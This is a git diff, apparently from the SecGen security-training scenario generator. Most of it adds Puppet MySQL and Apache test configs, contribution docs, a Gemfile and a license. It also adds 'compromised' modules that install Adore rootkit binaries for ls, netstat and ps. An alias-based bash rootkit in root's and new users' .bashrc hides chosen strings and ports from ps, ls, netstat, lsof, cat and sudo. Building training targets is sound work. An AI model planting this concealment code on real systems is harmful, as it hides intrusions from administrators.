+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/centos-7-x64.yml~upstream_stretch_kde_update
@@ -0,0 +1,10 @@
+HOSTS:
+ centos-7-x64:
+ roles:
+ - agent
+ - default
+ platform: el-7-x86_64
+ hypervisor: vagrant
+ box: puppetlabs/centos-7.2-64-nocm
+CONFIG:
+ type: foss
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/debian-8-x64.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/debian-8-x64.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..fef6e63ca
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/debian-8-x64.yml~upstream_stretch_kde_update
@@ -0,0 +1,10 @@
+HOSTS:
+ debian-8-x64:
+ roles:
+ - agent
+ - default
+ platform: debian-8-amd64
+ hypervisor: vagrant
+ box: puppetlabs/debian-8.2-64-nocm
+CONFIG:
+ type: foss
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/default.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/default.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..dba339c46
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/default.yml~upstream_stretch_kde_update
@@ -0,0 +1,10 @@
+HOSTS:
+ ubuntu-1404-x64:
+ roles:
+ - agent
+ - default
+ platform: ubuntu-14.04-amd64
+ hypervisor: vagrant
+ box: puppetlabs/ubuntu-14.04-64-nocm
+CONFIG:
+ type: foss
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/centos-7.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/centos-7.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..a3333aac5
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/centos-7.yml~upstream_stretch_kde_update
@@ -0,0 +1,12 @@
+HOSTS:
+ centos-7-x64:
+ platform: el-7-x86_64
+ hypervisor: docker
+ image: centos:7
+ docker_preserve_image: true
+ docker_cmd: '["/usr/sbin/init"]'
+ # install various tools required to get the image up to usable levels
+ docker_image_commands:
+ - 'yum install -y crontabs tar wget openssl sysvinit-tools iproute which initscripts'
+CONFIG:
+ trace_limit: 200
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/debian-8.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/debian-8.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..df5c31944
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/debian-8.yml~upstream_stretch_kde_update
@@ -0,0 +1,11 @@
+HOSTS:
+ debian-8-x64:
+ platform: debian-8-amd64
+ hypervisor: docker
+ image: debian:8
+ docker_preserve_image: true
+ docker_cmd: '["/sbin/init"]'
+ docker_image_commands:
+ - 'apt-get update && apt-get install -y net-tools wget locales strace lsof && echo "en_US.UTF-8 UTF-8" > /etc/locale.gen && locale-gen'
+CONFIG:
+ trace_limit: 200
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/ubuntu-14.04.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/ubuntu-14.04.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..b1efa5839
--- /dev/null
+++ b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/docker/ubuntu-14.04.yml~upstream_stretch_kde_update
@@ -0,0 +1,12 @@
+HOSTS:
+ ubuntu-1404-x64:
+ platform: ubuntu-14.04-amd64
+ hypervisor: docker
+ image: ubuntu:14.04
+ docker_preserve_image: true
+ docker_cmd: '["/sbin/init"]'
+ docker_image_commands:
+ # ensure that upstart is booting correctly in the container
+ - 'rm /usr/sbin/policy-rc.d && rm /sbin/initctl && dpkg-divert --rename --remove /sbin/initctl && apt-get update && apt-get install -y net-tools wget && locale-gen en_US.UTF-8'
+CONFIG:
+ trace_limit: 200
diff --git a/modules/services/unix/http/apache_stretch_compatible/apache/LICENSE b/modules/services/unix/database/mysql_wheezy_compatible/mysql/LICENSE~upstream_stretch_kde_update
similarity index 100%
rename from modules/services/unix/http/apache_stretch_compatible/apache/LICENSE
rename to modules/services/unix/database/mysql_wheezy_compatible/mysql/LICENSE~upstream_stretch_kde_update
diff --git a/modules/services/unix/http/apache_stretch_compatible/apache/CONTRIBUTING.md~upstream_stretch_kde_update b/modules/services/unix/http/apache_stretch_compatible/apache/CONTRIBUTING.md~upstream_stretch_kde_update
new file mode 100644
index 000000000..990edba7e
--- /dev/null
+++ b/modules/services/unix/http/apache_stretch_compatible/apache/CONTRIBUTING.md~upstream_stretch_kde_update
@@ -0,0 +1,217 @@
+Checklist (and a short version for the impatient)
+=================================================
+
+ * Commits:
+
+ - Make commits of logical units.
+
+ - Check for unnecessary whitespace with "git diff --check" before
+ committing.
+
+ - Commit using Unix line endings (check the settings around "crlf" in
+ git-config(1)).
+
+ - Do not check in commented out code or unneeded files.
+
+ - The first line of the commit message should be a short
+ description (50 characters is the soft limit, excluding ticket
+ number(s)), and should skip the full stop.
+
+ - Associate the issue in the message. The first line should include
+ the issue number in the form "(#XXXX) Rest of message".
+
+ - The body should provide a meaningful commit message, which:
+
+ - uses the imperative, present tense: "change", not "changed" or
+ "changes".
+
+ - includes motivation for the change, and contrasts its
+ implementation with the previous behavior.
+
+ - Make sure that you have tests for the bug you are fixing, or
+ feature you are adding.
+
+ - Make sure the test suites passes after your commit:
+ `bundle exec rspec spec/acceptance` More information on [testing](#Testing) below
+
+ - When introducing a new feature, make sure it is properly
+ documented in the README.md
+
+ * Submission:
+
+ * Pre-requisites:
+
+ - Make sure you have a [GitHub account](https://github.com/join)
+
+ - [Create a ticket](https://tickets.puppet.com/secure/CreateIssue!default.jspa), or [watch the ticket](https://tickets.puppet.com/browse/) you are patching for.
+
+ * Preferred method:
+
+ - Fork the repository on GitHub.
+
+ - Push your changes to a topic branch in your fork of the
+ repository. (the format ticket/1234-short_description_of_change is
+ usually preferred for this project).
+
+ - Submit a pull request to the repository in the puppetlabs
+ organization.
+
+The long version
+================
+
+ 1. Make separate commits for logically separate changes.
+
+ Please break your commits down into logically consistent units
+ which include new or changed tests relevant to the rest of the
+ change. The goal of doing this is to make the diff easier to
+ read for whoever is reviewing your code. In general, the easier
+ your diff is to read, the more likely someone will be happy to
+ review it and get it into the code base.
+
+ If you are going to refactor a piece of code, please do so as a
+ separate commit from your feature or bug fix changes.
+
+ We also really appreciate changes that include tests to make
+ sure the bug is not re-introduced, and that the feature is not
+ accidentally broken.
+
+ Describe the technical detail of the change(s). If your
+ description starts to get too long, that is a good sign that you
+ probably need to split up your commit into more finely grained
+ pieces.
+
+ Commits which plainly describe the things which help
+ reviewers check the patch and future developers understand the
+ code are much more likely to be merged in with a minimum of
+ bike-shedding or requested changes. Ideally, the commit message
+ would include information, and be in a form suitable for
+ inclusion in the release notes for the version of Puppet that
+ includes them.
+
+ Please also check that you are not introducing any trailing
+ whitespace or other "whitespace errors". You can do this by
+ running "git diff --check" on your changes before you commit.
+
+ 2. Sending your patches
+
+ To submit your changes via a GitHub pull request, we _highly_
+ recommend that you have them on a topic branch, instead of
+ directly on "master".
+ It makes things much easier to keep track of, especially if
+ you decide to work on another thing before your first change
+ is merged in.
+
+ GitHub has some pretty good
+ [general documentation](http://help.github.com/) on using
+ their site. They also have documentation on
+ [creating pull requests](http://help.github.com/send-pull-requests/).
+
+ In general, after pushing your topic branch up to your
+ repository on GitHub, you can switch to the branch in the
+ GitHub UI and click "Pull Request" towards the top of the page
+ in order to open a pull request.
+
+
+ 3. Update the related GitHub issue.
+
+ If there is a GitHub issue associated with the change you
+ submitted, then you should update the ticket to include the
+ location of your branch, along with any other commentary you
+ may wish to make.
+
+Testing
+=======
+
+Getting Started
+---------------
+
+Our puppet modules provide [`Gemfile`](./Gemfile)s which can tell a ruby
+package manager such as [bundler](http://bundler.io/) what Ruby packages,
+or Gems, are required to build, develop, and test this software.
+
+Please make sure you have [bundler installed](http://bundler.io/#getting-started)
+on your system, then use it to install all dependencies needed for this project,
+by running
+
+```shell
+% bundle install
+Fetching gem metadata from https://rubygems.org/........
+Fetching gem metadata from https://rubygems.org/..
+Using rake (10.1.0)
+Using builder (3.2.2)
+-- 8><-- many more --><8 --
+Using rspec-system-puppet (2.2.0)
+Using serverspec (0.6.3)
+Using rspec-system-serverspec (1.0.0)
+Using bundler (1.3.5)
+Your bundle is complete!
+Use `bundle show [gemname]` to see where a bundled gem is installed.
+```
+
+NOTE some systems may require you to run this command with sudo.
+
+If you already have those gems installed, make sure they are up-to-date:
+
+```shell
+% bundle update
+```
+
+With all dependencies in place and up-to-date we can now run the tests:
+
+```shell
+% bundle exec rake spec
+```
+
+This will execute all the [rspec tests](http://rspec-puppet.com/) tests
+under [spec/defines](./spec/defines), [spec/classes](./spec/classes),
+and so on. rspec tests may have the same kind of dependencies as the
+module they are testing. While the module defines in its [Modulefile](./Modulefile),
+rspec tests define them in [.fixtures.yml](./fixtures.yml).
+
+Some puppet modules also come with [beaker](https://github.com/puppetlabs/beaker)
+tests. These tests spin up a virtual machine under
+[VirtualBox](https://www.virtualbox.org/)) with, controlling it with
+[Vagrant](http://www.vagrantup.com/) to actually simulate scripted test
+scenarios. In order to run these, you will need both of those tools
+installed on your system.
+
+You can run them by issuing the following command
+
+```shell
+% bundle exec rake spec_clean
+% bundle exec rspec spec/acceptance
+```
+
+This will now download a pre-fabricated image configured in the [default node-set](./spec/acceptance/nodesets/default.yml),
+install puppet, copy this module and install its dependencies per [spec/spec_helper_acceptance.rb](./spec/spec_helper_acceptance.rb)
+and then run all the tests under [spec/acceptance](./spec/acceptance).
+
+Writing Tests
+-------------
+
+XXX getting started writing tests.
+
+If you have commit access to the repository
+===========================================
+
+Even if you have commit access to the repository, you will still need to
+go through the process above, and have someone else review and merge
+in your changes. The rule is that all changes must be reviewed by a
+developer on the project (that did not write the code) to ensure that
+all changes go through a code review process.
+
+Having someone other than the author of the topic branch recorded as
+performing the merge is the record that they performed the code
+review.
+
+
+Additional Resources
+====================
+
+* [Getting additional help](http://puppet.com/community/get-help)
+
+* [Writing tests](https://docs.puppet.com/guides/module_guides/bgtm.html#step-three-module-testing)
+
+* [General GitHub documentation](http://help.github.com/)
+
+* [GitHub pull request documentation](http://help.github.com/send-pull-requests/)
diff --git a/modules/services/unix/http/apache_stretch_compatible/apache/Gemfile~upstream_stretch_kde_update b/modules/services/unix/http/apache_stretch_compatible/apache/Gemfile~upstream_stretch_kde_update
new file mode 100644
index 000000000..46cb2eace
--- /dev/null
+++ b/modules/services/unix/http/apache_stretch_compatible/apache/Gemfile~upstream_stretch_kde_update
@@ -0,0 +1,75 @@
+#This file is generated by ModuleSync, do not edit.
+
+source ENV['GEM_SOURCE'] || "https://rubygems.org"
+
+# Determines what type of gem is requested based on place_or_version.
+def gem_type(place_or_version)
+ if place_or_version =~ /^git:/
+ :git
+ elsif place_or_version =~ /^file:/
+ :file
+ else
+ :gem
+ end
+end
+
+# Find a location or specific version for a gem. place_or_version can be a
+# version, which is most often used. It can also be git, which is specified as
+# `git://somewhere.git#branch`. You can also use a file source location, which
+# is specified as `file://some/location/on/disk`.
+def location_for(place_or_version, fake_version = nil)
+ if place_or_version =~ /^(git[:@][^#]*)#(.*)/
+ [fake_version, { :git => $1, :branch => $2, :require => false }].compact
+ elsif place_or_version =~ /^file:\/\/(.*)/
+ ['>= 0', { :path => File.expand_path($1), :require => false }]
+ else
+ [place_or_version, { :require => false }]
+ end
+end
+
+# Used for gem conditionals
+supports_windows = false
+ruby_version_segments = Gem::Version.new(RUBY_VERSION.dup).segments
+minor_version = "#{ruby_version_segments[0]}.#{ruby_version_segments[1]}"
+
+group :development do
+ gem "puppet-module-posix-default-r#{minor_version}", :require => false, :platforms => "ruby"
+ gem "puppet-module-win-default-r#{minor_version}", :require => false, :platforms => ["mswin", "mingw", "x64_mingw"]
+ gem "puppet-module-posix-dev-r#{minor_version}", :require => false, :platforms => "ruby"
+ gem "puppet-module-win-dev-r#{minor_version}", :require => false, :platforms => ["mswin", "mingw", "x64_mingw"]
+ gem "json_pure", '<= 2.0.1', :require => false if Gem::Version.new(RUBY_VERSION.dup) < Gem::Version.new('2.0.0')
+ gem "fast_gettext", '1.1.0', :require => false if Gem::Version.new(RUBY_VERSION.dup) < Gem::Version.new('2.1.0')
+ gem "fast_gettext", :require => false if Gem::Version.new(RUBY_VERSION.dup) >= Gem::Version.new('2.1.0')
+end
+
+group :system_tests do
+ gem "puppet-module-posix-system-r#{minor_version}", :require => false, :platforms => "ruby"
+ gem "puppet-module-win-system-r#{minor_version}", :require => false, :platforms => ["mswin", "mingw", "x64_mingw"]
+ gem "beaker", *location_for(ENV['BEAKER_VERSION'] || '>= 3')
+ gem "beaker-pe", :require => false
+ gem "beaker-rspec", *location_for(ENV['BEAKER_RSPEC_VERSION'])
+ gem "beaker-hostgenerator", *location_for(ENV['BEAKER_HOSTGENERATOR_VERSION'])
+ gem "beaker-abs", *location_for(ENV['BEAKER_ABS_VERSION'] || '~> 0.1')
+end
+
+gem 'puppet', *location_for(ENV['PUPPET_GEM_VERSION'])
+
+# Only explicitly specify Facter/Hiera if a version has been specified.
+# Otherwise it can lead to strange bundler behavior. If you are seeing weird
+# gem resolution behavior, try setting `DEBUG_RESOLVER` environment variable
+# to `1` and then run bundle install.
+gem 'facter', *location_for(ENV['FACTER_GEM_VERSION']) if ENV['FACTER_GEM_VERSION']
+gem 'hiera', *location_for(ENV['HIERA_GEM_VERSION']) if ENV['HIERA_GEM_VERSION']
+
+
+# Evaluate Gemfile.local if it exists
+if File.exists? "#{__FILE__}.local"
+ eval(File.read("#{__FILE__}.local"), binding)
+end
+
+# Evaluate ~/.gemfile if it exists
+if File.exists?(File.join(Dir.home, '.gemfile'))
+ eval(File.read(File.join(Dir.home, '.gemfile')), binding)
+end
+
+# vim:ft=ruby
diff --git a/modules/services/unix/http/apache_stretch_compatible/apache/LICENSE~upstream_stretch_kde_update b/modules/services/unix/http/apache_stretch_compatible/apache/LICENSE~upstream_stretch_kde_update
new file mode 100644
index 000000000..d64569567
--- /dev/null
+++ b/modules/services/unix/http/apache_stretch_compatible/apache/LICENSE~upstream_stretch_kde_update
@@ -0,0 +1,202 @@
+
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb b/modules/services/unix/http/apache_stretch_compatible/apache/spec/spec_helper.rb~upstream_stretch_kde_update
similarity index 100%
rename from modules/utilities/unix/languages/java_wheezy_compatible/java/spec/spec_helper.rb
rename to modules/services/unix/http/apache_stretch_compatible/apache/spec/spec_helper.rb~upstream_stretch_kde_update
diff --git a/modules/utilities/unix/audit_tools/binary_tools/binary_tools.pp b/modules/utilities/unix/audit_tools/binary_tools/binary_tools.pp
new file mode 100644
index 000000000..597673df0
--- /dev/null
+++ b/modules/utilities/unix/audit_tools/binary_tools/binary_tools.pp
@@ -0,0 +1 @@
+include binary_tools::install
diff --git a/modules/utilities/unix/audit_tools/binary_tools/manifests/install.pp b/modules/utilities/unix/audit_tools/binary_tools/manifests/install.pp
new file mode 100644
index 000000000..2d5f8e3dc
--- /dev/null
+++ b/modules/utilities/unix/audit_tools/binary_tools/manifests/install.pp
@@ -0,0 +1,5 @@
+class binary_tools::install{
+ package { ['binutils']:
+ ensure => 'installed',
+ }
+}
diff --git a/modules/utilities/unix/audit_tools/binary_tools/secgen_metadata.xml b/modules/utilities/unix/audit_tools/binary_tools/secgen_metadata.xml
new file mode 100644
index 000000000..14375d25e
--- /dev/null
+++ b/modules/utilities/unix/audit_tools/binary_tools/secgen_metadata.xml
@@ -0,0 +1,14 @@
+
+
+
+ Binary tools
+ Z. Cliffe Schreuders
+ Apache v2
+ Installs a collection of tools for binary analysis
+
+ audit_tools
+ linux
+
+
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/adore_rootkit_static.pp b/modules/utilities/unix/compromised/adore_rootkit_static/adore_rootkit_static.pp
new file mode 100644
index 000000000..0c4a1da36
--- /dev/null
+++ b/modules/utilities/unix/compromised/adore_rootkit_static/adore_rootkit_static.pp
@@ -0,0 +1 @@
+include adore_rootkit_static::install
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/files/ls b/modules/utilities/unix/compromised/adore_rootkit_static/files/ls
new file mode 100755
index 000000000..f15873f66
Binary files /dev/null and b/modules/utilities/unix/compromised/adore_rootkit_static/files/ls differ
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/files/netstat b/modules/utilities/unix/compromised/adore_rootkit_static/files/netstat
new file mode 100755
index 000000000..d39385f62
Binary files /dev/null and b/modules/utilities/unix/compromised/adore_rootkit_static/files/netstat differ
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/files/ps b/modules/utilities/unix/compromised/adore_rootkit_static/files/ps
new file mode 100755
index 000000000..704ac2dbb
Binary files /dev/null and b/modules/utilities/unix/compromised/adore_rootkit_static/files/ps differ
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/manifests/install.pp b/modules/utilities/unix/compromised/adore_rootkit_static/manifests/install.pp
new file mode 100644
index 000000000..e3ff3bc9d
--- /dev/null
+++ b/modules/utilities/unix/compromised/adore_rootkit_static/manifests/install.pp
@@ -0,0 +1,27 @@
+class adore_rootkit_static::install {
+
+ # TODO: rootkit configuration
+ # $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
+ # $hidden_ports = join($secgen_parameters['hidden_ports'], "\|")
+ # $hidden_strings = join($secgen_parameters['hidden_strings'], "\|")
+
+ file { '/bin/ls_a':
+ source => 'puppet:///modules/adore_rootkit_static/ls',
+ mode => '0755',
+ owner => 'root',
+ group => 'root',
+ }
+ file { '/bin/netstat_a':
+ source => 'puppet:///modules/adore_rootkit_static/netstat',
+ mode => '0755',
+ owner => 'root',
+ group => 'root',
+ }
+ file { '/bin/ps_a':
+ source => 'puppet:///modules/adore_rootkit_static/ps',
+ mode => '0755',
+ owner => 'root',
+ group => 'root',
+ }
+
+}
diff --git a/modules/utilities/unix/compromised/adore_rootkit_static/secgen_metadata.xml b/modules/utilities/unix/compromised/adore_rootkit_static/secgen_metadata.xml
new file mode 100644
index 000000000..4d2c2ed51
--- /dev/null
+++ b/modules/utilities/unix/compromised/adore_rootkit_static/secgen_metadata.xml
@@ -0,0 +1,30 @@
+
+
+
+ Adore rootkit binaries
+ Z. Cliffe Schreuders
+ MIT
+ Some static rootkit binaries from the Adore rootkit. (Not compiled by SecGen.)
+
+
+ rootkit
+ userspace_rootkit
+ linux
+
+
+
+
+
+
diff --git a/modules/utilities/unix/compromised/alias_rootkit/alias_rootkit.pp b/modules/utilities/unix/compromised/alias_rootkit/alias_rootkit.pp
new file mode 100644
index 000000000..e9098cbd7
--- /dev/null
+++ b/modules/utilities/unix/compromised/alias_rootkit/alias_rootkit.pp
@@ -0,0 +1 @@
+include alias_rootkit::install
diff --git a/modules/utilities/unix/compromised/alias_rootkit/manifests/install.pp b/modules/utilities/unix/compromised/alias_rootkit/manifests/install.pp
new file mode 100644
index 000000000..ac1d190b6
--- /dev/null
+++ b/modules/utilities/unix/compromised/alias_rootkit/manifests/install.pp
@@ -0,0 +1,24 @@
+class alias_rootkit::install {
+
+ $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file)
+ $hidden_ports = join($secgen_parameters['hidden_ports'], "\|")
+ $hidden_strings = join($secgen_parameters['hidden_strings'], "\|")
+
+ $aliases = "alias ps='f(){ ps \"$@\" |grep -v \"$hidden_strings\"; unset -f f; }; f'; alias ls='f(){ ls \"$@\" |grep -v \"$hidden_strings\" |column -c 80; unset -f f; }; f'; alias lsof='f(){ lsof \"$@\" |grep -v \"$hidden_strings\"; unset -f f; }; f'; alias netstat='f(){ netstat \"$@\" |grep -v \"$hidden_strings\|$hidden_ports\"; unset -f f; }; f'; alias cat='f(){ cat \"$@\" |grep -v \"$hidden_strings\|alias\"; unset -f f; }; f'; alias sudo='sudo_w'; sudo_w() { if [[ \"\$1\" =~ ^ls|/bin/ls|^ps|/bin/ps|^netstat|/bin/netstat|^lsof|/bin/lsof|^cat|/bin/cat ]]; then command sudo \$1 \"\${@:2}\" |grep -v \"$hidden_strings\|$hidden_ports\"; else command sudo \"$@\"; fi; }; alias alias='true'; shopt -s expand_aliases"
+ $skip_non_interactive = " *) return;;"
+
+ file_line { 'Append a line to /etc/skel/.bashrc':
+ path => '/etc/skel/.bashrc',
+ line => $aliases,
+ }
+ file_line { 'Append a line to /root/.bashrc':
+ path => '/root/.bashrc',
+ line => $aliases,
+ }
+ file_line { 'Remove a line from /root/.bashrc':
+ path => '/etc/skel/.bashrc',
+ line => $skip_non_interactive,
+ ensure => absent,
+ }
+
+}
diff --git a/modules/utilities/unix/compromised/alias_rootkit/secgen_metadata.xml b/modules/utilities/unix/compromised/alias_rootkit/secgen_metadata.xml
new file mode 100644
index 000000000..e06fd5cfa
--- /dev/null
+++ b/modules/utilities/unix/compromised/alias_rootkit/secgen_metadata.xml
@@ -0,0 +1,29 @@
+
+
+
+ Alias rootkit
+ Z. Cliffe Schreuders
+ MIT
+ A new simple bash-based rootkit based on using aliases to hide output from commands.
+ This module has to be included in the scenario BEFORE accounts are created, since it modifies all user accounts via /etc/skel.
+
+
+ rootkit
+ userspace_rootkit
+ linux
+
+ hidden_ports
+ hidden_strings
+
+
+ 4444
+ 12345
+
+
+ hideme
+ hme
+
+
+
diff --git a/modules/utilities/unix/compromised/dead_image/dead_image.pp b/modules/utilities/unix/compromised/dead_image/dead_image.pp
new file mode 100644
index 000000000..06f087323
--- /dev/null
+++ b/modules/utilities/unix/compromised/dead_image/dead_image.pp
@@ -0,0 +1 @@
+include dead_image::install
diff --git a/modules/utilities/unix/compromised/dead_image/manifests/install.pp b/modules/utilities/unix/compromised/dead_image/manifests/install.pp
